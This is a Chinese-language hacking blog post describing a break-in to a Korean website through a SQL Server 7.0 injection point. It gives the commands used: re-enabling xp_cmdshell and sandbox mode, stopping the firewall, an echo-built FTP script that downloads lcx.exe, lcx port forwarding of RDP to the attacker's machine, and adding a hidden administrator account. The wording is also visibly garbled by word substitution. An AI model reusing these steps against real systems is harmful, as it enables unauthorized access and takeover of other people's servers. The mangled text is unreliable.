下午搞了一个站,存在sa注入点裂痕,,window 2000+iis5。
通过注入点信息,发明sqlserver版本为7.00,以前见过一次这个版本,不外没有怎么深入研究,伴侣扫弱口令扫描到的,其时也提权了,详细健忘怎么提的了。附图。
。
扫描这个ip地点发明只对外开放了53跟80,韩国的鸟站,由此揣摩大概为内网可能外网可是限制了对外开放的端口。一般环境下会开启1433,跟3389的可是限制对外毗连。
sqlserver7.0的固然以前搞过,可是健忘详细怎么弄了,于是一步一步的先用穿山甲自带的成果规复xp_cmdshell,sp_oa**,sp_***job,尚有一个sandboxmode沙盒模式。都开启之后,随便执行set,ipconfig等呼吁发明没有回显,也不知道哪个组件可以呼吁。于是想到一个步伐。
此刻我本机执行lcx -listen 77 88通过77端口监听外部来的数据。然后在穿山甲里执行net stop sharedaccess通过xp_cmdshell,然后sp_oa**,sp_***job,沙盒模式一一执行,固然不知道乐成没,可是假如可以执行呼吁,必定可以乐成,目标是为了是对方呆板能对外发送数据。接着跟适才一样执行telnet 我的ip 22端口,最终发明通过沙盒模式可以执行呼吁。
可是对方的3389不答允毗连,这时候想通过lcx端口转发来毗连对方的3389,固然不确定是3389可是碰碰命运。
个中的ftp传文件下载文件我亲自测试过,就用这个了。
echo open www.ftp.com>ftp.TXT //毗连FTP
echo username>>ftp.TXT
//输入用户名
echo password>>ftp.TXT
//输入暗码
echo get lcx c:lcx.exe>>ftp.TXT //执行下载呼吁
echo
bye>>ftp.TXT
//退出
ftp
-s:ftp.txt
//执行FTP.TXT文件中的FTP呼吁
在穿山甲里依次执行以下语句,假如没有非凡环境。lcx就下载到对方呆板c盘目次下了。
然后通过沙河模式执行c:/lcx.exe -slave 我的ip 77 127.0.0.1 3389
本机执行lcx -listen 77 88。
过了一小会发明有数据返回,证明lcx已经传上去了,而且将对方3389端口转发到本机上了。
本机再毗连127.0.0.1:88,可以毗连上终端,然后在穿山甲执行添加用户的呼吁net user user password /add
net localgroup administrators user /add毗连终端,乐成登岸。如图。
中间碰着一些问题就不说了。有什么疑问的可以提出来。
